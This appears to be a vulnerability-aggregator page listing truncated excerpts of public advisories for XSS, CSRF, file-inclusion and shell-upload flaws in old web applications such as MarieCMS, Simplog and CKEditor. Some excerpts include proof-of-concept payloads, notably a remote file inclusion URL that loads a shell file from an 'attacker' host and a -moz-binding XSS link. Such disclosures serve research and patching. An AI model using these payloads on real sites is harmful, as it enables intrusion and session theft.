oBlog - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Brute Force

------------------------------------------------------------------------------------------------- Application: oBlog Version: the only one there is : Download: http://www.dootzky.com/images/projects/oBlog.zip Author of this full disclosure: Milos Zivanovic Vulnerabilities: Persistant XSS, CSRF,...

Viscacha 0.8 Gold persistant XSS vulnerability

No description provided by source. Viscacha 0.8 Gold persistant XSS vulnerability Found By: mrme Download: http://www.viscacha.org/ Tested On: Windows Vista Note: For educational purposes only POC Info: A regular user of the board can embed javascript code that could be executed within the contex...

Viscacha 0.8 Gold - Persistent Cross-Site Scripting

Viscacha 0.8 Gold persistant XSS vulnerability Found By: mrme Download: http://www.viscacha.org/ Tested On: Windows Vista Note: For educational purposes only POC Info: A regular user of the board can embed javascript code that could be executed within the context of the admin's browser. If the us...

MarieCMS v0.9 LFI, RFI, and XSS Vulnerabilities

Exploit for unknown platform in category web applications =============================================== MarieCMS v0.9 LFI, RFI, and XSS Vulnerabilities =============================================== OVERVIEW MarieCMS v0.9 vulnerable to following issues: ++ Remote File Inclusion ++ Local File...

MarieCMS 0.9 - Local File Inclusion Remote File Inclusion Cross-Site Scripting

MarieCMS 0.9 - Local File Inclusion Remote File Inclusion Cross-Site Scripting OVERVIEW MarieCMS v0.9 vulnerable to following issues: ++ Remote File Inclusion ++ Local File Inclusion ++ Persistent XSS ++ Shell Upload Authenticated User PoC Remote File Inclusion: ++++++++++++++++++++++++...

Barracuda IMFirewall 620 Vulnerability

No description provided by source. PenTest Information: ==================== GESEC Team remove discover multiple Input Validation Vulnerabilities on Barracuda IM Firewall. A remote attacker is able to get sensitive customer sessions client-sideor can implement evil script routines & malicious...

MarieCMS v0.9 LFI RFI and XSS Vulnerabilities

No description provided by source. OVERVIEW MarieCMS v0.9 vulnerable to following issues: ++ Remote File Inclusion ++ Local File Inclusion ++ Persistent XSS ++ Shell Upload Authenticated User PoC Remote File Inclusion: ++++++++++++++++++++++++...

MarieCMS 0.9 LFI / RFI / XSS

Mutliple Vulnerabilities in MarieCMS v0.9 Name Multiple vulnerabilities in MarieCMS Systems Affected MarieCMS v0.9 Download http://sourceforge.net/projects/mariecms/files/MarieCMS/MarieCMS%200.9/mariecmsv0.9.zip/download Author Amol Naik amolnaik4atgmail.com Date 07/12/2009 OVERVIEW MarieCMS v0.9...

Chipmunk Newsletter Persistant XSS Vulnerability

Exploit for unknown platform in category web applications ================================================ Chipmunk Newsletter Persistant XSS Vulnerability ================================================ Tested On: Windows Vista Note: For educational purposes only There’s probably a lot more...

MarieCMS 0.9 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting

OVERVIEW MarieCMS v0.9 vulnerable to following issues: ++ Remote File Inclusion ++ Local File Inclusion ++ Persistent XSS ++ Shell Upload Authenticated User PoC Remote File Inclusion: ++++++++++++++++++++++++ http://server/mariecms/?page=http://attacker/site/shell.txt? Local File Inclusion:...

Simplog 0.9.3.2 XSS / XSRF

Mutliple Vulnerabilities in Simplog v0.9.3.2 Name Multiple vulnerabilities in Simplog Systems Affected Simplog 0.9.3.2 and possibly earlier versions Download http://sourceforge.net/projects/simplog/files/simplog/0.9.3.2/simplog-0.9.3.2.tar.gz/download Author Amol Naik amolnaik4atgmail.com Date...

Simplog v0.9.3.2 Mutliple Vulnerabilities

Exploit for unknown platform in category web applications ========================================= Simplog v0.9.3.2 Mutliple Vulnerabilities ========================================= Mutliple Vulnerabilities in Simplog v0.9.3.2 Name Multiple vulnerabilities in Simplog Systems Affected Simplog...

Simplog 0.9.3.2 - Multiple Vulnerabilities

Simplog 0.9.3.2 - Multiple Vulnerabilities Mutliple Vulnerabilities in Simplog v0.9.3.2 Name Multiple vulnerabilities in Simplog Systems Affected Simplog 0.9.3.2 and possibly earlier versions Download http://sourceforge.net/projects/simplog/files/simplog/0.9.3.2/simplog-0.9.3.2.tar.gz/download...

Simplog 0.9.3.2 - Multiple Vulnerabilities

Mutliple Vulnerabilities in Simplog v0.9.3.2 Name Multiple vulnerabilities in Simplog Systems Affected Simplog 0.9.3.2 and possibly earlier versions Download http://sourceforge.net/projects/simplog/files/simplog/0.9.3.2/simplog-0.9.3.2.tar.gz/download Author Amol Naik amolnaik4atgmail.com Date...

CGI Generic XSS (persistent)

The remote web server hosts one or more CGI scripts that fail to adequately sanitize request strings containing malicious JavaScript. By leveraging this issue, an attacker may be able to cause arbitrary HTML and script code to be executed in a user's browser within the security context of the...

Achievo < 1.4.0 Multiple Vulnerabilities

Binary data 5208.prm...

[BONSAI] XSS in Achievo - Customized XSS payload included

Bonsai Information Security - Advisory http://www.bonsai-sec.com/research/ Multiple XSS in Achievo 1. Advisory Information Title: Multiple XSS in Achievo Advisory ID: BONSAI-2009-0101 Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt Date published:...

Achievo Cross Site Scripting

Bonsai Information Security - Advisory http://www.bonsai-sec.com/research/ Multiple XSS in Achievo 1. Advisory Information Title: Multiple XSS in Achievo Advisory ID: BONSAI-2009-0101 Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt Date published:...

XSS and Content Spoofing vulnerabilities in CKEditor

Hello 3APA3A! I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in CKEditor. XSS: This is Persistent XSS vulnerability. Attack is conducting via placing link with setting the style. a href="http://test"...

XSS and Content Spoofing vulnerabilities in FCKeditor

Hello 3APA3A! I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in FCKeditor. XSS: This is Persistent XSS vulnerability. Attack is conducting via placing link with setting the style. a href="http://test" style="-moz-binding:url'http://site/xss.xmlxss'"test/a This...